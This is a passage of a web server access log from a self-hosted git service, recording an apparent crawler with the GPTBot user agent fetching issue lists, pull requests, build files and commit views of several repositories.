"https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:18:52:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:18:52:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:18:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:18:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 129724] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:18:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:52:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:52:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 81116] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:18:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 12058] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:18:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11419] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:52:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:18:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:18:52:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:18:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:18:52:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:52:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10121] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?state=open&type=all" [Client 74.7.227.38] [Length 9941] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:18:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?state=open&type=all" [Client 74.7.227.38] [Length 10112] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:18:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 